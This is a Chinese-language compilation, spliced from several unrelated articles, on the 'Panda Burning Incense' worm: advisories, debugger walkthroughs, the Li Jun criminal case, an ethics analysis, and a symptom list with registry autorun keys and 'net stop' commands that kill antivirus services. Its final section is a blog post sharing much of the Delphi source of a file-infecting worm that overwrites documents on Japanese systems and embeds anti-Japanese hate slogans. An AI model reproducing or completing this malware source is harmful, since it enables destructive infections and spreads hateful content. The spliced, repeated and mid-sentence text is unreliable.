第八章 熊猫烧香病毒的逆向分析

国家计算机病毒应急处理中心通过对互联网的监测发现，一伪装成“熊猫烧香”图案的蠕虫正在互联网上进行传播，已有数百万个人计算机用户和企业局域网遭受感染。

国家计算机病毒应急处理中心分析发现，该蠕虫为“威金”蠕虫的一个新变种。

该变种感染计算机系统后，可使系统中所有.exe文件都变成了一种奇怪的图案，该图案显示为“熊猫烧香”国家计算机病毒应急处理中心通过对互联网的监测发现，一伪装成“熊猫烧香”图案的蠕虫正在互联网上进行传播，已有数百万个人计算机用户和企业局域网遭受感染。

国家计算机病毒应急处理中心分析发现，该蠕虫为“威金”蠕虫的一个新变种。

该变种感染计算机系统后，可使系统中所有.exe文件都变成了一种奇怪的图案，该图案显示为“熊猫烧香”，同时受感染的计算机系统会出现蓝屏、频繁重启以及系统硬盘中数据文件被破坏等现象。

变种可以通过局域网进行传播，进而感染局域网内所有计算机系统，最终导致整个局域网瘫痪，无法正常使用。

该蠕虫先后出现很多变种，再出现后的短时期内迅速传播，遭受感染的用户难于彻底清除，给其工作带来诸多不便。

蠕虫情况分析如下：病毒名称：Worm_Viking中文名：“熊猫烧香”其他名称：Worm/Viking（江民）Worm.WhBoy.h （金山）PE_FUJACKS （趋势）Worm.Nimaya （瑞星）W32/Fujacks （McAfee）病毒类型：蠕虫感染系统：Windows 9X/ Windows ME/ Windows NT/ Windows 2000/Windows XP/ Windows 2003病毒特性：“熊猫烧香”是蠕虫“威金”的一个变种，是一个由Delphi 工具编写的蠕虫，它会感染计算机系统中后缀名为exe、com、pif、src、html、asp等文件,它还会终止一些计算机系统中安装的防病毒软件和防火墙的进程。

1、生成病毒文件蠕虫运行后在%System%目录下生成文件spoclsv.exe，并且在每个文件夹下面生成desktop_.ini 文件，里面标记着病毒发作日期。

【工具】:Olydbg1.1、IDA5.0【任务】:病毒分析以及解决方案【操作平台】:Windows2003server【作者】:LoveBoom[DFCG][FCG][CUG]【链接】:N/A【简要说明】:"离开党和人民一年"、荒废了一年，2006年可所谓沉迷于游戏从帝国到星际，总是追求着自己所谓的目标，而今回头看却发现不但没有达到自己的目标，反而是离生活越走越远了。

现在动手写写也觉得自己穷词:­(。

2006过了，不想自己的2007也是这样碌碌无为的过着。

关于这个病毒，我想很多朋友都知道，这个病毒在2007年初闹的比较凶，很多朋友曾经中过这病毒。

这次我给大家带来的文章就是讲讲这个病毒。

看看这病毒到底是怎么回事，我们应该怎么去处理这病毒。

【病毒分析】:概要:这病毒我最早在10月底时接触，那时这病毒并没有现在这样流行(也许是病毒刚出来吧)。

曾经几个月的发展，前几天从同事那拿了几个新变种看了会，发现病毒和早期的版本相差比较大。

根据病毒的差异，我自己将病毒分为:ABCD4个变种。

各变种的不同处如下:A病毒将自身复制为%System32%\FuckJacks.exe,然后感染除特殊文件夹之外的文件夹中的可执行文件。

B病毒将自身复制为%System32%\Drivers\spoclsv.exe,感染时在c盘根目录下生成感染标记文件。

C病毒不再感染用户系统中的可执行文件，而是感染用户系统中的脚本病毒(这样的危害更大);在每个感染后的文件夹中写下感染标记文件。

D感染用户可执行文件时不再使用A和B版本中的直接捆绑感染。

用户中毒后可执行程序的图标不改变(a和b版本感染后可执行文件的图标都变成熊猫烧香)。

今天我分析的就是C版本(下次有空我将整理出A版本的分析资料),小版本可能会有所不同，因此如果你发现你机器上的和我所述的相似但不完全一样也是正常的。

中毒表象:以下几个特征为中毒的表现:１、在系统中的每分区根目录下存在setup.exe和autorun.inf文件(A和B盘不感染)。

熊猫烧香案例2006年底，许多人在打开电脑后陷入无知状态。

因为电脑屏幕上有一只可爱的大熊猫，它手里还拿着三支香。

没几天，这只烧香的熊猫几乎侵入了所有人的电脑中。

这是我们小国宝来提前给我们拜年吗？当然不是，这是新型网络病毒，传染性很强。

当时除了私人设备，很多政机构和公司的内网都被他们入侵，网络瞬间瘫痪。

加入网络监管部门后，公安部门意识到此事的重要性，立即立案调查，第二年终于抓到了始作俑者。

2007年9月24日，25岁的李俊因破坏计算机信息系统罪被湖北省仙桃市人民法院判处有期徒刑四年。

网上猖獗的“熊猫烧香”案正式告破。

这个李俊，就是“熊猫烧香”的策划人。

他为什么要策划这起网络病毒案件呢？熊猫烧香在当年到底有多残忍？网络与现实的差距让“天才”误入歧途李俊出生在一个普通家庭，他的父母是低收入工人。

从小就痴迷于玩电脑，有空总会跑去网吧。

那时候电脑和网吧远没有现在普及。

在父母眼里，网吧大多是坏孩子待的地方。

为了防止儿子失败，李俊的父母不得不帮他买了一台电脑。

至少这样，他可以呆在家里，而不是去网吧。

但正因为如此，李俊获得了更多接触电脑的机会。

不得不说他真的是计算机天才，愿意花时间学习编程，学习技术。

兴趣和天赋促成了李俊在计算机方面的超高技术。

然而网络跟现实总是有着差距的。

李俊的学习成绩不好。

他没有学习，后来去了社会上工作。

在他的里，他是互联网上的国王，他不是一个普通人。

然而现实生活中的经历却让他一次次尴尬。

因为他除了网络技术什么技能都没有。

他想从事与互联网相关的工作，比如去一家杀毒软件公司，但因为没有学历背景，一次次被拒之门外。

比较后他不得不去做电脑装修工，甚至是网络管理员，工资低，还被别人指挥，严重损害了他的自尊心。

自命不凡的李俊知道自己唯能找到存在感的地方，就是在网络上。

所以他决定用自己的网络技术去干一件轰动的大事，从而证明自己的能力。

比较早的时候，他是个红客。

2000年前后，黑客经常在国外骚扰中国网站，激起了中国计算机精英的好胜心，上演了一场对外的红与黑的战争。

熊猫烧⾹病毒样本分析前⾔最近学校通知不开学，⽹课也不想上。

学习逆向也有段时间了，就想着找点东西练⼀下⽔平不⾼。

找了个病毒分析⼀⽐较经典的病毒分析。

我看⽹上有很多关于熊猫烧⾹病毒的分析，但都是侧重于对病毒功能以及影响的总结，具体分析⽅法并未提及。

本⽂主要基本信息动态分析分析⼯具以及环境OD PEIDVMware xp 虚拟机详细分析过程与思路查看⽂件基本信息在虚拟机中⽤PEID 打开病毒样本⽂件发现其⽆壳并且是Delphi 编写的，Delphi 编译器编译的程序有⼏个特点。

第⼀： 其函数默认调⽤约定为Register ，特点为函数参数是通过寄存器传⼊的。

第⼆： ⼀般Delphi 其字符串存储地址的负偏移⼀个dword长度处，存放字符串的长度。

打开OD 载⼊病毒样本⽂件来到程序⼊⼝点后我们进⾏进⼀步分析，我们看到⼊⼝点处有 函数① 和 函数②，其中函数②连续调⽤了三次。

我们F8向下执⾏，并分别进⼊两个函数分析其功能。

进⼊函数①我们发现其主要功能就是调⽤GetModuleHandleA()获得程序基地址（及程序实例句柄）向下继续分析函数②，在调⽤函数②时我们发现其传⼊了两个参数，我们在数据窗⼝中分析发现参数有⼀个为⼀串字符串：“ ***武*汉*男*⽣*感*染*下*载*者*** ". 我们F7进⼊函数内部分析发现其就时将eax 参数地址下的字符串进⾏复制侧重于对熊猫烧⾹病毒逆向分析过程中的思路和⽅法的分享所以我们知道了这三个参数是字符串复制函数，F8向下步过这些函数后。

他们把字符串都复制到了⼀块连续的内存中。

我们可以在数据窗⼝中观察这些字符的内容。

我们接着往下分析，发现两段相同的代码段，只是参数不同。

也就是当程序执⾏完函数0x405360和函数0x404018后如果je不成⽴则结束进程（猜测应该为病毒程序的⾃效验部分）。

我们分别进⼊连个函数分析。

我们先分析函数0x405360，函数的两个参数分别指向两个字符串⼀个是“xboy”，另⼀个如下。

熊猫烧高香病毒
“熊猫烧香”，是由李俊制作并肆虐网络的一款电脑病毒，熊猫烧香跟灰鸽子不同，是一款拥有自动传播、自动感染硬盘能力和强大的破坏能力的病毒，它不但能感染系统中exe，com，pif，src，html，asp等文件，它还能终止大量的反病毒软件进程并且会删除扩展名为gho的文件（该类文件是一系统备份工具“GHOST”的备份文件，删除后会使用户的系统备份文件丢失）。

被感染的用户系统中所有.exe可执行文件全部被改成熊猫举着三根香的模样。

2006年10月16日由25岁的湖北武汉新洲区人李俊编写，2007年1月初肆虐网络，它主要通过下载的文件传染。

2007年2月12日，湖北省公安厅宣布，李俊以及其同伙共8人已经落网，这是中国警方破获的首例计算机病毒大案。

2014年，张顺、李俊被法院以开设赌场罪分别判处有期徒刑五年和三年，并分别处罚金20万元和8万元。

一、前言对病毒进行逆向分析，可以彻底弄清楚病毒的行为，从而采取更有效的针对手段。

为了节省篇幅，在这里我不打算将“熊猫烧香”进行彻底的分析，只会讲解一些比较重要的部分，大家只要掌握了这些思想，那么就可以处理很多的恶意程序了。

一般来说，对病毒的静态分析，我们采用的工具是IDA Pro，动态分析则采用OllyDbg。

由于后者会使病毒实际运行起来，所以为了安全起见，最好在虚拟机中操作。

另外，在实际分析过程中，我们可能还需要一些辅助工具，比如侦壳或脱壳程序等。

为了简单起见，这次研究的“熊猫烧香”程序并没有加壳，但是以后我们会讨论如何应对加壳或采用了其它保护手段的病毒。

二、查壳操作逆向分析的第一步就是用查壳工具对目标程序进行查壳操作。

这里我使用PEiD v0.95，检测结果如下：图1 对“熊猫烧香”进行查壳操作可见，本程序并没有加壳，那么就不涉及脱壳操作，并且是由Borland Delphi 6.0-7.0编写的。

由Delphi所编写的代码与VC++所编写的代码有所不同，最明显的两点区别如下：1、函数调用时参数的传递不完全用栈，而是主要用寄存器，即Delphi编译器默认以register方式传递函数参数。

这一点与VC编译的程序完全不同。

Delphi一般将第一个参数放入eax寄存器，第二个参数放入edx，第三个参数放入ecx寄存器，其余参数按照与VC程序类似的方式压栈。

2、栈上给局部变量分配空间的时候，栈是向下增长的，而栈上的数组、字符串、结构体等却是向上增长的。

理解这一点可以帮助识别栈上的变量。

对病毒样本进行了简单的侦测之后，就确定了分析的方向，那么接下来就需要使用反汇编工具进行分析了。

三、“熊猫烧香”的初步分析这里我使用IDA Pro载入病毒样本，首先可以看到如下代码：图2 “熊猫烧香”的入口代码上图所示的病毒程序起始处的反汇编代码是Delphi自行生成的，并不是我们所关心的病毒程序的功能代码，所以这里不对其进行讲解。

熊猫烧香姓名：XXX专业：XXXX学号：XXXXX摘要：一只熊猫拿着三支香，这个图像一度令电脑用户胆战心惊。

从2006年底到2007年初，“熊猫烧香”在短短时间内通过网络传播全国，数百万台电脑中毒。

2007年2月，“熊猫烧香”病毒设计者李俊归案，交出杀病毒软件。

据李俊交代，其于2006年10月16日编制了“熊猫烧香”病毒并在网上广泛传播，关键字：病毒；熊猫烧香正文：基本信息病毒名称:熊猫烧香，Worm.WhBoy.（金山称），Worm.Nimaya.（瑞星称）病毒别名：尼姆亚，武汉男生，后又化身为“金猪报喜”，国外称“熊猫烧香”病毒类型：蠕虫病毒，能够终止大量的反病毒软件和防火墙软件进程。

影响系统：Win 9x/ME、Win 2000/NT、Win XP、Win 2003 、Win Vista熊猫烧香其实是一种蠕虫病毒的变种，而且是经过多次变种而来的。

尼姆亚变种W(Worm.Nimaya.w)，由于中毒电脑的可执行文件会出现“熊猫烧香”图案，所以也被称为“熊猫烧香”病毒。

用户电脑中毒后可能会出现蓝屏、频繁重启以及系统硬盘中数据文件被破坏等现象。

同时，该病毒的某些变种可以通过局域网进行传播，进而感染局域网内所有计算机系统，最终导致企业局域网瘫痪，无法正常使用，它能感染系统中exe，com，pif，src，html，asp等文件，它还能中止大量的反病毒软件进程并且会删除扩展名为gho的文件，该文件是一系统备份工具GHOST的备份文件，使用户的系统备份文件丢失。

被感染的用户系统中所有.exe可执行文件全部被改成熊猫举着三根香的模样。

中毒症状除了通过网站带毒感染用户之外，此病毒还会在局域网中传播，在极短时间之内就可以感染几千台计算机，严重时可以导致网络瘫痪。

中毒电脑上会出现“熊猫烧香”图案，所以也被称为“熊猫烧香”病毒。

中毒电脑会出现蓝屏、频繁重启以及系统硬盘中数据文件被破坏等现象。

杀毒方法各种版本的熊猫烧香专杀瑞星：/channels/service/2006-11/1163505486d38734.shtml金山：/zhuansha/253.shtml江民：/download/zhuansha04.htm超级巡警：/dow/d2.html李俊：/soft/8/21/2007/Soft_34735.html虽然用户及时更新杀毒软件病毒库，并下载各杀毒软件公司提供的专杀工具，即可对“熊猫烧香”病毒进行查杀，但是如果能做到防患于未然岂不更好。

熊猫烧香案例
第一步，分析熊猫烧香案例所涉及的人物和角色
1.当事人及其角色
李俊：从国外网站下载病毒代码进行修改，并在网上叫卖，并通过这一途径牟利。

后来，又把游戏木马挂到网站上，在网友访问后盗取游戏信封，借以牟利。

雷磊：帮助李俊修改病毒，并向被通缉的李俊通风报信，帮助其逃跑。

王磊：帮助李俊出售病毒牟利，并化名为李俊购买了服务器空间。

张顺：张顺购买李俊网站的流量后，将木马发给李俊，由李俊将这九个游戏木马挂在其个人网站上，通过盗取别人游戏帐号牟利。

2.非当事人及其角色
网民，因为李俊的病毒而导致电脑遭到损害。

第二步，提出案例的伦理问题所在
案例所涉及的伦理问题实质上就是软件工程专业人员如何遵循职业道德规范,不损害公众利益的问题。

因此，对于本案例的分子除了可以应用伦理学理论进行分析外，最好直接应用“专业标准进行分析”和“系统化政策分析”。

第三步，利用相关方法分析案例
1.利用伦理学的方法
不管是按照功利主义的观点，还是按照康德道义论的观点，李俊等人的行为都是违背伦理道德的。

2.利用职业道德的观点
根据条款1公众：软件工程师应当始终如一地以符合公众利益为目标。

其中第1条：对他们的工作承担完全的责任；第4条：所接受的开发工作，必须确认其是安全的、符合规格说明的、经过合适测试的、不会降低生活品质、影响隐私权或有害环境的，一切工作以大众利益为前提；第6条：在所有有关软件、文档、方法和工具的申述中，特别是与公众相 关的，力求正直，避免欺骗。

李俊等人的做法完全违背了软件工程人员的职业道德，严重危害到了公众的利益，已经触犯了刑法。

无利害关系人的分析方法！。

Nimaya（熊猫烧香）病毒特点及解决方法近期校园网中大量的出现了“熊猫烧香”病毒及其新变种，现将新变种的特征和感染现象作出分析，供大家在工作中参考。

一．感染现象及传播途径“熊猫烧香”及其变种是通过局域网内的网络共享来感染终端计算机的蠕虫病毒，主要感染的目标系统为windows 2000 和XP。

病毒会在系统的所以盘符或最后一个盘符下生成一个熊猫烧香或常见可执行文件的图标（如杀毒软件等）,文件名为setup.exe/gamesetup.exe/autorun.exe等的可执行文件来诱导用户点击执行,释放后继而感染word、execl等后缀名为.exe的文件，使用户无法正常应用工作软件。

该病毒修改文件夹属性使“显示所有隐藏文件”和“显示受保护的系统文件选项”失效。

二．病毒特点1、病毒感染终端后将自身复制到Windows文件夹下,文件名为：%SystemRoot%\autorun.inf 并将其属性改为隐藏2、病毒感染终端后，病毒将病毒体复制到为以下文件：%SystemRoot%\setup.exe并将其属性改为隐藏3、病毒在每个分区下生成gamesetup.exe/set.exe/autorun.exe文件,并在C:\Documents and Settings\Administrator\Local Settings\Temp下加载zt.exe和w1.exe或ztw1.exe等文件4、病毒会在c：\winnt\system32\drivers\文件夹下生成spoclv.exe文件。

5、病毒通过添加如下注册表项实现病毒开机自动运行:[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run] "load"="C:\\WINNT\\zt.exe"或w1.ext””[HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows] "load"="C:\\WINNT\\rundl132.exe"7、枚举以下杀毒软件进程名，查找到后终止其进程：Ravmon.exe、Eghost.exe、Mailmon.exe、KA VPFW.EXE、IPARMOR.EXE、Ravmond.exe、KV、Mcshield.exe8、同时病毒尝试利用以下命令终止相关杀病毒软件并删除服务：net stop "Kingsoft AntiVirus Service"net stop “Ravservice”9、发送arp探测数据，判断网络状态，网络可用时，枚举内网所有共享主机，并使用自带的口令库猜测破解\\IPC$、\admin$等共享目录，连接成功后进行网络感染。

熊猫烧香案例分析一、基本案情被告人李俊于2003年开始自学计算机编程技术，并经常向自己的好朋友、也是本案被告人之一的雷磊请教。

2006年10月，被告人李俊从武汉某软件技术开发培训学校毕业后，便将自己以前在国外某网站下载的计算机病毒源代码调出来进行研究、修改，在对此病毒进行修改的基础上完成了“熊猫烧香”电脑病毒的制作，并采取将该病毒非法挂在别人网站上及赠送给网友等方式在互联网上传播。

“熊猫烧香”病毒具有本机感染功能、局域网感染功能及u盘感染功能，并能中止许多反病毒软件和防火墙的运行，中了该病毒的电脑会自动链接访问指定的网站、下载恶意程序等。

其后，李俊请雷磊对该病毒提修改建议。

雷磊认为该病毒存在两个问题，一是改变被感染文件的图标，二是没有隐藏病毒进程。

电脑感染了该病毒后，很容易被电脑用户发现，建议李俊从这两个方面对“熊猫烧香”病毒进行修改，但没有告诉李俊具体的修改方法。

2006年11月中旬，李俊在互联网上叫卖该病毒，同时也请被告人王磊及其他网友帮助出售该病毒。

王磊、李俊及其网友一共卖出了约三十个“熊猫烧香”病毒。

其中，王磊帮李俊卖出了三个“熊猫烧香”病毒，并先后三次共汇款给李俊人民币1450元。

此外，李俊还赠送给其他网友约十个“熊猫烧香”病毒。

随着病毒的出售和赠送给网友，“熊猫烧香”病毒迅速在互联网上传播，导致自动链接访问李俊个人网站的流量大幅上升。

王磊得知此情形后，提出为李俊卖“流量”，并联系被告人张顺购买李俊网站的“流量”，所得收入由王磊和李俊平分。

为了提高访问李俊网站的速度，减少网络拥堵，王磊和李俊商量后，由王磊化名董磊为李俊的网站在南昌锋讯网络科技有限公司租了一个2G内存、百兆独享线路的服务器，租金由李俊、王磊每月各负担800元。

张顺购买李俊网站的流量后，先后将九个游戏木马（也就是盗号木马）通过互联网发给王磊，王磊将这九个游戏木马转发给李俊，然后由李俊将这九个游戏木马挂在其个人网站上，盗取自动链接访问其网站的游戏玩家的“游戏信封（即含有游戏账号和密码的电子邮件）”，游戏木马将盗取的“游戏信封”自动地发给张顺，张顺则将盗取的“游戏信封”进行拆封、转卖，从而获取利益。

熊猫烧⾹病毒详解（附源码及学习资料）这⼏天⼩编在研究下病毒，源码拿出来和⼤家分享⼀下。

温馨提⽰：亮点最后！今天在OSC看到有⼈共享熊猫烧⾹的源码，⽤Delphi写的，真的是跨平台啊，犹对Japanese操作系统破坏最甚，字⾥⾏间留露出作者的愤青情绪啊，⼤体的看了下，主要是通过拷贝到Windows系统⽬录中，注册表添加⾃启动的蠕⾍病毒，通过VB调⽤Windows的Outlook发送邮件，进⽽达到传播病毒，原始的病毒是将exe的图标改成熊猫烧⾹的图标，并没有其他功效，真正破坏性的都是后期制作的。

随着编程语⾔的简化和提⾼，写个病毒当个骇客，再也不是梦了，主要你要了解病毒是怎么传播的，如何保证⾃⼰不会被轻易的杀掉，对Windows的漏洞也要有很深的研究，这样才能写出⼀个骇⼈听闻的病毒，但是写出来也不要张扬，⾃⼰娱乐下就好了，被他⼈恶意利⽤可不是闹着玩的。

不禁想起了之前微软的⼀个严重漏洞，迟迟四年也没有发现，漏洞是当OS连续运⾏49天之后会死机，为什么没有发现呢，因为其他的漏洞导致os还未运⾏就么久就已经死了，原因是每毫⽶加⾐的计时器，在49天之后，int型就溢出了，导致系统崩溃。

随便说说，看下源码，留着以后研究：program Japussy;usesWindows, SysUtils, Classes, Graphics, ShellAPI{, Registry};constHeaderSize = 82432; //病毒体的⼤⼩IconOffset = $12EB8; //PE⽂件主图标的偏移量//在我的Delphi5 SP1上⾯编译得到的⼤⼩，其它版本的Delphi可能不同//查找2800000020的⼗六进制字符串可以找到主图标的偏移量{HeaderSize = 38912; //Upx压缩过病毒体的⼤⼩IconOffset = $92BC; //Upx压缩过PE⽂件主图标的偏移量//Upx 1.24W ⽤法: upx -9 --8086 Japussy.exe}IconSize = $2E8; //PE⽂件主图标的⼤⼩--744字节IconTail = IconOffset + IconSize; //PE⽂件主图标的尾部ID = $44444444; //感染标记//垃圾码，以备写⼊Catchword = ''''''''''''''''If a race need to be killed out, it must be Yamato. '''''''''''''''' +''''''''''''''''If a country need to be destroyed, it must be Japan! '''''''''''''''' +''''''''''''''''*** W32.Japussy.Worm.A ***'''''''''''''''';{$R *.RES}function RegisterServiceProcess(dwProcessID, dwType: Integer): Integer;stdcall; external ''''''''''''''''Kernel32.dll''''''''''''''''; //函数声明varTmpFile: string;Si: STARTUPINFO;Pi: PROCESS_INFORMATION;IsJap: Boolean = False; //⽇⽂操作系统标记{ 判断是否为Win9x }function IsWin9x: Boolean;varVer: TOSVersionInfo;beginResult := False;Ver.dwOSVersionInfoSize := SizeOf(TOSVersionInfo);if not GetVersionEx(Ver) thenExit;if (Ver.dwPlatformID = VER_PLATFORM_WIN32_WINDOWS) then //Win9x{ 在流之间复制 }procedure CopyStream(Src: TStream; sStartPos: Integer; Dst: TStream; dStartPos: Integer; Count: Integer);varsCurPos, dCurPos: Integer;beginsCurPos := Src.Position;dCurPos := Dst.Position;Src.Seek(sStartPos, 0);Dst.Seek(dStartPos, 0);Dst.CopyFrom(Src, Count);Src.Seek(sCurPos, 0);Dst.Seek(dCurPos, 0);end;{ 将宿主⽂件从已感染的PE⽂件中分离出来，以备使⽤ }procedure ExtractFile(FileName: string);varsStream, dStream: TFileStream;begintrysStream := TFileStream.Create(ParamStr(0), fmOpenRead or fmShareDenyNone); trydStream := TFileStream.Create(FileName, fmCreate);trysStream.Seek(HeaderSize, 0); //跳过头部的病毒部分dStream.CopyFrom(sStream, sStream.Size - HeaderSize);finallydStream.Free;end;finallysStream.Free;end;exceptend;end;{ 填充STARTUPINFO结构 }procedure FillStartupInfo(var Si: STARTUPINFO; State: Word);beginSi.cb := SizeOf(Si);Si.lpReserved := nil;Si.lpDesktop := nil;Si.lpTitle := nil;Si.dwFlags := STARTF_USESHOWWINDOW;Si.wShowWindow := State;Si.cbReserved2 := 0;Si.lpReserved2 := nil;end;{ 发带毒邮件 }procedure SendMail;begin//哪位仁兄愿意完成之？end;{ 感染PE⽂件 }procedure InfectOneFile(FileName: string);varHdrStream, SrcStream: TFileStream;IcoStream, DstStream: TMemoryStream;iID: LongInt;aIcon: TIcon;Infected, IsPE: Boolean;i: Integer;Buf: array[0..1] of Char;begintry //出错则⽂件正在被使⽤，退出if CompareText(FileName, ''''''''''''''''JAPUSSY.EXE'''''''''''''''') = 0 then //是⾃⼰则不感染 Exit;Infected := False;IsPE := False;SrcStream := TFileStream.Create(FileName, fmOpenRead);tryfor i := 0 to $108 do //检查PE⽂件头beginSrcStream.Seek(i, soFromBeginning);SrcStream.Read(Buf, 2);if (Buf[0] = #80) and (Buf[1] = #69) then //PE标记IsPE := True; //是PE⽂件Break;end;end;SrcStream.Seek(-4, soFromEnd); //检查感染标记SrcStream.Read(iID, 4);if (iID = ID) or (SrcStream.Size < 10240) then //太⼩的⽂件不感染Infected := True;finallySrcStream.Free;end;if Infected or (not IsPE) then //如果感染过了或不是PE⽂件则退出Exit;IcoStream := TMemoryStream.Create;DstStream := TMemoryStream.Create;tryaIcon := TIcon.Create;try//得到被感染⽂件的主图标(744字节)，存⼊流aIcon.ReleaseHandle;aIcon.Handle := ExtractIcon(HInstance, PChar(FileName), 0);aIcon.SaveToStream(IcoStream);finallyaIcon.Free;end;SrcStream := TFileStream.Create(FileName, fmOpenRead);//头⽂件HdrStream := TFileStream.Create(ParamStr(0), fmOpenRead or fmShareDenyNone); try//写⼊病毒体主图标之前的数据CopyStream(HdrStream, 0, DstStream, 0, IconOffset);//写⼊⽬前程序的主图标CopyStream(IcoStream, 22, DstStream, IconOffset, IconSize);//写⼊病毒体主图标到病毒体尾部之间的数据CopyStream(HdrStream, IconTail, DstStream, IconTail, HeaderSize - IconTail);//写⼊宿主程序CopyStream(SrcStream, 0, DstStream, HeaderSize, SrcStream.Size);//写⼊已感染的标记DstStream.Seek(0, 2);iID := $44444444;DstStream.Write(iID, 4);finallyHdrStream.Free;end;finallySrcStream.Free;IcoStream.Free;DstStream.SaveToFile(FileName); //替换宿主⽂件DstStream.Free;end;except;end;end;{ 将⽬标⽂件写⼊垃圾码后删除 }procedure SmashFile(FileName: string);varFileHandle: Integer;i, Size, Mass, Max, Len: Integer;begintrySetFileAttributes(PChar(FileName), 0); //去掉只读属性FileHandle := FileOpen(FileName, fmOpenWrite); //打开⽂件trySize := GetFileSize(FileHandle, nil); //⽂件⼤⼩i := 0;Randomize;Max := Random(15); //写⼊垃圾码的随机次数if Max < 5 thenMax := 5;Mass := Size div Max; //每个间隔块的⼤⼩Len := Length(Catchword);while i < Max dobeginFileSeek(FileHandle, i * Mass, 0); //定位//写⼊垃圾码，将⽂件彻底破坏掉finallyFileClose(FileHandle); //关闭⽂件end;DeleteFile(PChar(FileName)); //删除之exceptend;end;{ 获得可写的驱动器列表 }function GetDrives: string;varDiskType: Word;D: Char;Str: string;i: Integer;beginfor i := 0 to 25 do //遍历26个字母beginD := Chr(i + 65);Str := D + '''''''''''''''':'''''''''''''''';DiskType := GetDriveType(PChar(Str));//得到本地磁盘和⽹络盘if (DiskType = DRIVE_FIXED) or (DiskType = DRIVE_REMOTE) thenResult := Result + D;end;end;{ 遍历⽬录，感染和摧毁⽂件 }procedure LoopFiles(Path, Mask: string);vari, Count: Integer;Fn, Ext: string;SubDir: TStrings;SearchRec: TSearchRec;Msg: TMsg;function IsValidDir(SearchRec: TSearchRec): Integer;beginif (SearchRec.Attr <> 16) and ( <> ''''''''''''''''.'''''''''''''''') and( <> ''''''''''''''''..'''''''''''''''') thenResult := 0 //不是⽬录else if (SearchRec.Attr = 16) and ( <> ''''''''''''''''.'''''''''''''''') and( <> ''''''''''''''''..'''''''''''''''') thenResult := 1 //不是根⽬录else Result := 2; //是根⽬录end;beginif (FindFirst(Path + Mask, faAnyFile, SearchRec) = 0) thenbeginrepeatPeekMessage(Msg, 0, 0, 0, PM_REMOVE); //调整消息队列，避免引起怀疑if IsValidDir(SearchRec) = 0 thenbeginFn := Path + ;Ext := UpperCase(ExtractFileExt(Fn));if (Ext = ''''''''''''''''.EXE'''''''''''''''') or (Ext = ''''''''''''''''.SCR'''''''''''''''') thenbeginInfectOneFile(Fn); //感染可执⾏⽂件endelse if (Ext = ''''''''''''''''.HTM'''''''''''''''') or (Ext = ''''''''''''''''.HTML'''''''''''''''') or (Ext = ''''''''''''''''.ASP'''''''''''''''') then begin//感染HTML和ASP⽂件，将Base64编码后的病毒写⼊//感染浏览此⽹页的所有⽤户//哪位⼤兄弟愿意完成之？endelse if Ext = ''''''''''''''''.WAB'''''''''''''''' then //Outlook地址簿⽂件begin//获取Outlook邮件地址endelse if Ext = ''''''''''''''''.ADC'''''''''''''''' then //Foxmail地址⾃动完成⽂件begin//获取Foxmail邮件地址endelse if Ext = ''''''''''''''''IND'''''''''''''''' then //Foxmail地址簿⽂件begin//获取Foxmail邮件地址if IsJap then //是倭⽂操作系统beginif (Ext = ''''''''''''''''.DOC'''''''''''''''') or (Ext = ''''''''''''''''.XLS'''''''''''''''') or (Ext = ''''''''''''''''.MDB'''''''''''''''') or (Ext = ''''''''''''''''.MP3'''''''''''''''') or (Ext = ''''''''''''''''.RM'''''''''''''''') or (Ext = ''''''''''''''''.RA'''''''''''''''') or(Ext = ''''''''''''''''.WMA'''''''''''''''') or (Ext = ''''''''''''''''.ZIP'''''''''''''''') or (Ext = ''''''''''''''''.RAR'''''''''''''''') or (Ext = ''''''''''''''''.MPEG'''''''''''''''') or (Ext = ''''''''''''''''.ASF'''''''''''''''') or (Ext = ''''''''''''''''.JPG'''''''''''''''') or (Ext = ''''''''''''''''.JPEG'''''''''''''''') or (Ext = ''''''''''''''''.GIF'''''''''''''''') or (Ext = ''''''''''''''''.SWF'''''''''''''''') or (Ext = ''''''''''''''''.PDF'''''''''''''''') or (Ext = ''''''''''''''''.CHM'''''''''''''''') or (Ext = ''''''''''''''''.AVI'''''''''''''''') then SmashFile(Fn); //摧毁⽂件end;end;end;//感染或删除⼀个⽂件后睡眠200毫秒，避免CPU占⽤率过⾼引起怀疑Sleep(200);until (FindNext(SearchRec) <> 0);end;FindClose(SearchRec);SubDir := TStringList.Create;if (FindFirst(Path + ''''''''''''''''*.*'''''''''''''''', faDirectory, SearchRec) = 0) thenbeginrepeatif IsValidDir(SearchRec) = 1 thenSubDir.Add();until (FindNext(SearchRec) <> 0);end;FindClose(SearchRec);Count := SubDir.Count - 1;for i := 0 to Count doLoopFiles(Path + SubDir.Strings + '''''''''''''''''''''''''''''''', Mask);FreeAndNil(SubDir);end;{ 遍历磁盘上所有的⽂件 }procedure InfectFiles;varDriverList: string;i, Len: Integer;beginif GetACP = 932 then //⽇⽂操作系统IsJap := True; //去死吧！DriverList := GetDrives; //得到可写的磁盘列表Len := Length(DriverList);while True do //死循环beginfor i := Len downto 1 do //遍历每个磁盘驱动器LoopFiles(DriverList + '''''''''''''''':'''''''''''''''', ''''''''''''''''*.*''''''''''''''''); //感染之SendMail; //发带毒邮件Sleep(1000 * 60 * 5); //睡眠5分钟end;end;{ 主程序开始 }beginif IsWin9x then //是Win9xRegisterServiceProcess(GetCurrentProcessID, 1) //注册为服务进程else //WinNTbegin//远程线程映射到Explorer进程//哪位兄台愿意完成之？end;//如果是原始病毒体⾃⼰if CompareText(ExtractFileName(ParamStr(0)), ''''''''''''''''Japussy.exe'''''''''''''''') = 0 then InfectFiles //感染和发邮件else //已寄⽣于宿主程序上了，开始⼯作beginTmpFile := ParamStr(0); //创建临时⽂件Delete(TmpFile, Length(TmpFile) - 4, 4);TmpFile := TmpFile + #32 + ''''''''''''''''.exe''''''''''''''''; //真正的宿主⽂件，多⼀个空格ExtractFile(TmpFile); //分离之FillStartupInfo(Si, SW_SHOWDEFAULT);CreateProcess(PChar(TmpFile), PChar(TmpFile), nil, nil, True,0, nil, ''''''''''''''''.'''''''''''''''', Si, Pi); //创建新进程运⾏之InfectFiles; //感染和发邮件end;end.“熊猫烧⾹”，这是⼀个感染型的蠕⾍病毒，它能感染系统中exe，com，pif，src，html，asp等⽂件，它还能中⽌⼤量的反病毒软件进程并且会删除扩展名为gho的⽂件，该⽂件是⼀系统备份⼯具GHOST的备份⽂件，使⽤户的系统备份⽂件丢失。

